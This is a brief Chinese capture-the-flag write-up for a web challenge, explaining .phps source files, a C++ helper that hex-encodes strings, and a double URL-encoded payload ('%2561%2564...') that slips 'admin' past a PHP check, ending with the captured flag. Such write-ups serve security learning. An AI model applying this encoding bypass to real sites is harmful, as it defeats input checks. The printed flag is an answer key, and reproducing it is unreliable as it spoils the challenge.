phps文件就是php的源代码文件,通常用于提供给用户(访问者)直接通过Web浏览器查看php代码的内容。
因为用户无法直接通过Web浏览器“看到”php文件的内容,所以需要用phps文件代替。
得到源码,发现是当id等于admin的时候出flag
不过在此之前他要进行一次url的解码,加上浏览器的,一共是两次。
直接get方法 id=admin是不能通过的
URL其实就是16进制加一个%,所以用C++写了个代码
#include<bits/stdc++.h>
using namespace std;
int main(){
char a[1000];
scanf("%s",&a);
for(int i=0;i<strlen(a);i++){
printf("%%");
printf("%x",a[i]);
}
printf("\n");
return 0;
}
输入admin的十六进制:%61%64%6d%69%6e
然后在进行URL编码:%2561%2564%256d%2569%256e
得到flag: cyberpeace{e49ebf43c1b812edb6350682fe1786fe}